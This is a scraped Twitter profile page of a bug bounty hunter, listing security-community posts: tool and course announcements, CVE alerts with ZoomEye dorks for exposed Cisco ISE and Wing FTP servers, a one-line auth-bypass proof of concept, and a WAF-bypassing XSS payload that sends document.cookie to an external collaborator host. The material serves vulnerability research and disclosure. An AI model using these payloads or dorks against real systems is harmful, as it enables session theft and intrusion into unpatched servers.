Shlok K (@huh0x01) 's Twitter Profile
Shlok K

@huh0x01

Bug bounty hunter | CTFs T.U.S.K | Web | Ambassador @InfoSecComm

ID: 1432714994861367303

linkhttps://bugcrowd.com/pphreak_1001 calendar_today31-08-2021 14:41:08

1,1K Tweet

315 Followers

478 Following

Francisco Neves (@fneves97) 's Twitter Profile Photo

Intigriti I built jxscout exactly for this purpose! Instead of going through a checklist of things to look for in JS files, jxscout automates that for you github.com/francisconeves… 🚀

𐰚𐰼𐰇𐱅 (@ynsmroztas) 's Twitter Profile Photo

I wrote a tool for Vite Arbitary File Read, you can find it here 🔥🔥🔥 #github github.com/ynsmroztas/Vit… for search ZoomEye service="http" && app="vite" #BugBounty #bugbountytip

I wrote a tool for Vite Arbitary File Read, you can find it here 🔥🔥🔥

#github

github.com/ynsmroztas/Vit…

for search

<a href="/zoomeye_team/">ZoomEye</a>
 service="http" &amp;&amp; app="vite"

#BugBounty 
#bugbountytip
Mehdi (@silentgh00st) 's Twitter Profile Photo

#bugbountytip Quick tip and script : ✅️ If you are hunting or scanning a WordPress instance, don't forget to look for exposed plugins' or WP core REST endpoints, under /wp-json.. many plugins like payments gateways are exposing the webhooks or callback plugins in order to

#bugbountytip 
Quick tip and script : ✅️

If you are hunting or scanning a WordPress instance, don't forget to look for exposed plugins' or WP core REST endpoints, under /wp-json.. many plugins like payments gateways are exposing the webhooks or callback plugins in order to
Harshleen Chawla (@harshleenchawl2) 's Twitter Profile Photo

📌New Updates in AV/EDR Evasion Practical Techniques Free Course by Red Team Leaders credit- Joas A Santos 🔗redteamleaders.coursestack.com/courses/3e9e02… 🔗github.com/CyberSecurityU…

📌New Updates in AV/EDR Evasion Practical Techniques Free Course by Red Team Leaders
credit- Joas A Santos

🔗redteamleaders.coursestack.com/courses/3e9e02…

🔗github.com/CyberSecurityU…
OpenSecurityTraining2 (@opensectraining) 's Twitter Profile Photo

📣"Fuzzing 1001: Introductory white-box fuzzing with AFL++" by Francesco Pollicino is now released!📣 ost2.fyi/Fuzz1001 This class covers progressively more features and functionality of AFL++ to teach students how to find real past vulnerabilities.

OpenSecurityTraining2 (@opensectraining) 's Twitter Profile Photo

This class dovetails nicely with the "Secure Development / Vulnerabilities 1001: C-Family Software Implementation Vulnerabilities" class (ost2.fyi/Vulns1001), which introduces fuzzing as a necessary tool in both the developer and vuln hunter's toolbox, but which left more

Dark Web Informer - Cyber Threat Intelligence (@darkwebinformer) 's Twitter Profile Photo

🚨CVE-2025-20281 & CVE-2025-20282: Unauthenticated RCE Vulnerabilities in Cisco ISE and ISE-PIC • CVSS: 10 • ZoomEye Dork: app="Cisco ISE" • Results: 1,937 • Advisory: github.com/advisories/GHS… • PoC: github.com/abrewer251/CVE… • ZoomEye Search: zoomeye.ai/searchResult?q…

🚨CVE-2025-20281 &amp; CVE-2025-20282: Unauthenticated RCE Vulnerabilities in Cisco ISE and ISE-PIC

• CVSS: 10
• ZoomEye Dork: app="Cisco ISE"
• Results: 1,937
• Advisory:
github.com/advisories/GHS…

• PoC: github.com/abrewer251/CVE…

• ZoomEye Search: zoomeye.ai/searchResult?q…
ZoomEye (@zoomeye_team) 's Twitter Profile Photo

⚡️The vulnerability details are now available: hub.zoomeye.ai/detail/686382b… 🚨🚨CVE-2025-47812: Wing FTP Server RCE! Hackers can exploit a nasty null byte injection flaw to run ANY code as root/SYSTEM—no login needed! ZoomEye Dork👉app="Wing FTP Server" Over 78K+ vulnerable servers

⚡️The vulnerability details are now available: hub.zoomeye.ai/detail/686382b…

🚨🚨CVE-2025-47812: Wing FTP Server RCE! Hackers can exploit a nasty null byte injection flaw to run ANY code as root/SYSTEM—no login needed! 

ZoomEye Dork👉app="Wing FTP Server"
Over 78K+ vulnerable servers
Bipin Jitiya (@win3zz) 's Twitter Profile Photo

CVE-2025-41646 Critical auth bypass in RevPi Webstatus (<= v2.4.5) ⚠️ Affects ICS/OT Root Cause: Backend accepts JSON boolean true in place of the expected password hash - weak equality comparison PoC: Pass { "hashcode": true } to login --> full access! Patch: Update to v2.4.6

CVE-2025-41646 
Critical auth bypass in RevPi Webstatus (&lt;= v2.4.5)
⚠️ Affects ICS/OT

Root Cause: Backend accepts JSON boolean true in place of the expected password hash - weak equality comparison

PoC: Pass { "hashcode": true } to login --&gt; full access!
Patch: Update to v2.4.6
Mr.Niko (@_mrniko) 's Twitter Profile Photo

🚨 Received a New #CVE 🚨 CVE-2025-5472 - Denial of Service via JSON Parsing in LlamaIndex (GPT Index) Severity: Medium (6.5) Packages: llama_index, llama_index-core Versions: < 0.12.28 huntr.com/bounties/df187… #LLMs #redteam #pentesting #BugBounty

🚨 Received a New #CVE 🚨

CVE-2025-5472 - Denial of Service via JSON Parsing in LlamaIndex (GPT Index)
Severity: Medium (6.5)
Packages: llama_index, llama_index-core
Versions: &lt; 0.12.28

huntr.com/bounties/df187…

#LLMs #redteam #pentesting #BugBounty
Khalil Afridi (@khalilapriday) 's Twitter Profile Photo

🎉 For everyone asking about a Free Linux System Administration Course – ✅ 60 hrs content ✅ Labs + badge ✅ Lifetime access ✅ $0 cost Linux powers 90%+ of cloud & servers. Huge demand in DevOps, CyberSec & SysAdmin! training.linuxfoundation.org/training/intro…

🎉 For everyone asking about a Free Linux System
Administration Course – 

✅ 60 hrs content
✅ Labs + badge
✅ Lifetime access
✅ $0 cost
Linux powers 90%+ of cloud &amp; servers.

Huge demand in DevOps, CyberSec &amp; SysAdmin!

training.linuxfoundation.org/training/intro…
N$ (@nav1n0x) 's Twitter Profile Photo

This payload bypasses Cloudflare waf in certain cases: "top[8680439..toString(30)](document.domain)" or "top[8680439..toString(30)](new%20Image().src%3D%27https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty

This payload bypasses Cloudflare waf in certain cases: "top[8680439..toString(30)](document.domain)" or "top[8680439..toString(30)](new%20Image().src%3D%27https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty